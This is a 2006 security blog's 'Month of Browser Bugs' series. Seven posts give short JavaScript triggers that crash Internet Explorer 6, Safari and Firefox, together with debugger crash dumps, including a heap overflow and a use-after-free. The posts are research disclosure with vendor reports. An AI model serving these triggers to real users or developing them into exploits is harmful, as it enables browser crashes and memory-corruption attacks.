Browser Fun

Thursday, July 06, 2006

MoBB #7: Table.Frameset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specifed depth. An alternate PoC could use plain HTML instead of javascript.

var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);

Demonstration

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Frameset inside Table NULL Dereference

Wednesday, July 05, 2006

MoBB #6: StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

Demonstration

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference

Tuesday, July 04, 2006

MoBB #5: DHTML setAttributeNode()

The following bug was tested on the latest version of Safari ( 2.0.4 / 419.3) on a fully-patched Mac OS X (10.4.7 - Build 8J135) system. This bug was discovered by Dennis Cox using a modified version of the Hamachi test. This bug does not trigger using the Konqueror KHTML/KJS engine included with KDE 3.5.1, even though these products share code.

var a = document.createElement("a");
a.setAttributeNode();

Demonstration

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0000000c

Thread 0 Crashed:
0 com.apple.WebCore DOM::NamedAttrMapImpl::setNamedItem()
1 com.apple.WebCore DOM::Element::setAttributeNodeNS()
2 com.apple.WebCore DOM::Element::setAttributeNode()

This bug will be added to the OSVDB:
Apple Safari DHTML setAttributeNode() NULL Dereference

Monday, July 03, 2006

MoBB #4: Mozilla Firefox DesignMode

The following bug was tested on Mozilla Firefox 1.5.0.2 running on Gentoo Linux. This bug was fixed in Firefox 1.5.0.3, after three other people reported this issue to Mozilla. This bug results in a function pointer being called that no longer exists on the heap. Exploiting it is more annoying than difficult, since getting user-provided memory to map over the free'd object pointer is more convoluted than it should be.

document.designMode = "on";
for (i=0; i < 300; i++) {
document.execCommand("InsertHTML", false, "<iframe src='localhost'/>");
}
document.designMode = "off";
window.location.reload(true);

Demonstration

EIP on Gentoo Linux / Firefox 1.5.0.1
0x00737069 in ?? ()

This bug was addressed in MFSA2006-30.
This bug has been added to the OSVDB:
Mozilla Firefox iframe.contentWindow.focus() Overflow

Sunday, July 02, 2006

MoBB #3: OutlookExpress.AddressBook

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Window XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer.

a = new ActiveXControl('OutlookExpress.AddressBook');

Demonstration

eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.

MoBB #2: Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}

Demonstration

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.

Welcome to the Browser Fun Blog!

This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!